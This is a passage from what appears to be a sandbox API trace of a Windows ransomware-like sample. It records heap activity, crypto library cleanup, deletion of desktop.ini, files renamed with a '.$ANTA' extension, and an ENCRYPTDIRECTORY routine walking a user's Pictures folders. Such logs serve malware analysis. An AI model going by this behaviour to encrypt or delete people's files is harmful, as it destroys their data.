0x43ca718 [0091.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0091.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0091.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0091.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0091.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0091.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0091.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0091.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0091.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0091.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0091.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0091.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0091.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0091.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0091.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0091.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0091.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0091.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0091.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0091.696] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0091.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0091.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0091.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0091.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0091.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0091.697] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0091.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0091.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0091.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0091.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0091.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0091.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0091.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0091.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0091.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0091.699] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0091.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0091.700] FreeLibrary (hLibModule=0x756e0000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0091.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0091.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0091.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0091.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0091.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0091.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0091.701] CloseHandle (hObject=0x298) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0091.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0091.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0091.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0091.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0091.702] CloseHandle (hObject=0x258) returned 1 [0091.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0091.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.706] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini", lpFilePart=0x0) returned 0x30 [0091.706] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\desktop.ini")) returned 0x6 [0091.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0091.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0091.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0091.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0091.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0091.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0091.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0091.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.911] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac000 [0091.912] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\desktop.ini")) returned 1 [0091.913] FindNextFileW (in: hFindFile=0x41ac000, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0091.913] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0091.913] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0091.914] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll")) returned 0x11 [0091.914] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2ebb983, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x2ebb983, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca400, cFileName=".", cAlternateFileName="")) returned 0x41ac000 [0091.914] FindNextFileW (in: hFindFile=0x41ac000, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2ebb983, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x2ebb983, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca400, cFileName="..", cAlternateFileName="")) returned 1 [0091.914] FindNextFileW (in: hFindFile=0x41ac000, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bc0a12, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x2bc0a12, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x2ca58d0, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xc0, dwReserved0=0x0, dwReserved1=0x43ca400, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0091.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0091.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0091.914] FindNextFileW (in: hFindFile=0x41ac000, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e25f0, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e25f0, ftLastWriteTime.dwLowDateTime=0x43e9c68, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="杻мńဓ+\x10")) returned 0 [0091.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0091.914] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0091.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0091.915] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0091.915] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0091.915] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0091.915] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd45bd980, ftCreationTime.dwHighDateTime=0x1d5e6c6, ftLastAccessTime.dwLowDateTime=0x603183b0, ftLastAccessTime.dwHighDateTime=0x1d5ee5b, ftLastWriteTime.dwLowDateTime=0x603183b0, ftLastWriteTime.dwHighDateTime=0x1d5ee5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca358, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0091.915] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd45bd980, ftCreationTime.dwHighDateTime=0x1d5e6c6, 